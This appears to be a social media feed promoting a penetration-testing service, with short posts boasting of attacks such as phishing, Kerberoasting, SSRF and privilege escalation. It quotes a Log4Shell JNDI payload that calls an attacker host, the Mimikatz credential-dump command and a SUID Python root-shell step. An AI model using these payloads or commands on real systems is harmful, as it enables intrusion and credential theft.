Real hacking. Real tools. Real commands.

Joined September 2019
I took over their subdomain. Dangling CNAME to a deleted S3 bucket. Now it serves my content. #hacking #cybersecurity #bugbounty
12 admin accounts cracked. 3 of them used 'password' as the base word. In 2026. We deserve to get hacked. #infosec #hashcat #pentesting
Any domain user can request a service ticket. That ticket is encrypted with the service account's hash. Hashcat does the rest. #infosec #kerberoast
I phished 500 employees with one email. 73% opened it. 312 entered their passwords. Social engineering at scale. #hacking #cybersecurity
The payment table had 8,291 records too. One parameter was all it took to dump everything. Validate your inputs. #cybersecurity #appsec #sqlinjection
${jndi:ldap://attacker/exploit}. That's it. That's the entire payload. The server called my LDAP and executed my class. #infosec #log4shell
I stole every credential from Windows memory. Mimikatz. One command. 47 passwords in plaintext. #hacking #cybersecurity #mimikatz
The SIEM had 50 rules for HTTP exfil. Zero for DNS. I pushed 847 database records through TXT queries. Nobody noticed for 3 weeks. #hacking #threatintel
Most pentest reports say 'SQL injection possible' and sit in P3 forever. Pentevo ships findings with the actual response body. No damage proof, no finding. CISOs: of your last 10 critical findings, how many had real proof-of-impact? #ciso #cybersecurity
subfinder found 847 subdomains. 3 had dangling CNAMEs. I claimed one and it now serves my page under their domain. #infosec #recon
I went from guest to root in 60 seconds. One misconfigured SUID binary. Game over. #hacking #cybersecurity #linux
The web app fetched URLs for image previews. I pointed it at the metadata endpoint. Got temp creds. Downloaded everything. #hacking #cloudsecurity
GoPhish, fake password reset, valid SSL cert. 4 hours later: 312 passwords harvested. 14 C-suite execs among them. #infosec #phishing
I captured 47 NTLM hashes just by listening on the network. No exploits. No brute force. Just Responder. #hacking #cybersecurity
Free WiFi isn't free. One laptop. One WiFi adapter. A fake access point. 14 sets of credentials captured in 45 minutes. #hacking #awareness
sekurlsa::logonpasswords. 47 credentials from LSASS. Domain admin. SQL service account. Backup service. All in plaintext. #infosec #windows
I got a reverse shell with one command. Full root access. They never saw the connection. #hacking #cybersecurity #pentesting
Container escape to host root. The Docker socket was mounted inside the container. I spawned a new privileged container and broke out. #hacking #docker
Python3 had the SUID bit set. import os. setuid(0). Root shell. SSH keys to 8 more servers. Total compromise. #pentesting #privesc
I cracked 10,000 passwords in 30 seconds. One GPU. One wordlist. MD5 never stood a chance. #hacking #cybersecurity #hashcat